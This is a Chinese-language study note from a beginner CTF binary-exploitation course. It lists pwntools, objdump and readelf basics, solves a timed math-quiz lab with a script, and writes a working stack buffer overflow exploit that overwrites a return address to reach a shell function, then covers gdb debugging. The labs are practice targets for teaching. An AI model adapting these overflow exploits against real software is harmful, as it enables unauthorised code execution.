NTUSTISC - Pwn Basic 1 [2019.03.12]学习记录


pwntools的一些函数
1.jpg

objdump
2.jpg

readelf
3.jpg

binary format
4.jpg

x64 calling convention(64位下调用规则)
5.jpg

lab0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <unistd.h>

void handler(int signum){
puts("Timeout");
_exit(1);
}

int main()
{
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
signal(SIGALRM, handler);
alarm(90);

unsigned seed = (unsigned)time(NULL);
srand(seed);

unsigned int magic;
printf("Give me the magic number :)\n");
read(0, &magic, 4);
if (magic != 3735928559) {
printf("Bye~\n");
exit(0);
}

printf("Complete 1000 math questions in 90 seconds!!!\n");
for (int i = 0; i < 1000; ++i) {
int a = random() % 65535;
int b = random() % 65535;
int c = random() % 3;
int ans;
switch(c) {
case 0:
printf("%d + %d = ?", a, b);
scanf("%d", &ans);
if (ans != a + b) {
printf("Bye Bye~\n");
exit(0);
}
break;
case 1:
printf("%d - %d = ?", a, b);
scanf("%d", &ans);
if (ans != a - b) {
printf("Bye Bye~\n");
exit(0);
}
break;
case 2:
printf("%d * %d = ?", a, b);
scanf("%d", &ans);
if (ans != a * b) {
printf("Bye Bye~\n");
exit(0);
}
break;
}
}
printf("Good job!\n");
system("sh");

return 0;
}

过一次验证,然后回答1000个问题就可以了

1
2
3
4
5
6
7
8
9
10
from pwn import *
p=process("./pwntools")
p.recvuntil("number :)\n")
p.sendline(p32(3735928559))
p.recvuntil("seconds!!!\n")
for i in range(0,1000):
a=p.recvuntil(" = ?").replace(" = ?","")
print(a)
p.sendline(str(eval(a)))
p.interactive()

lab1

源码处buf只有16的大小。但是read读了0x30个大小。可造成栈溢出
7-1.jpg

找到shell函数的地址
7-2.jpg

buf是16,下面有个rbp(栈底)是8位。16+8=0x18
7-3.jpg

脚本就写出来了

1
2
3
4
5
6
7
8
9
from pwn import *
r=process("./bof")
raw_input()
magic=0x400607
payload='a'*0x18+p64(magic)
r.recvuntil(";)\n")
r.send(payload)

r.interactive()

at调式之法

1
2
3
python脚本跑起来之后
gdb ./bof
at pid

8-1.jpg

ret出call
8-2.jpg

来到了函数地方
8-3.jpg

参数都传给寄存器了,就开始调用了
8-4.jpg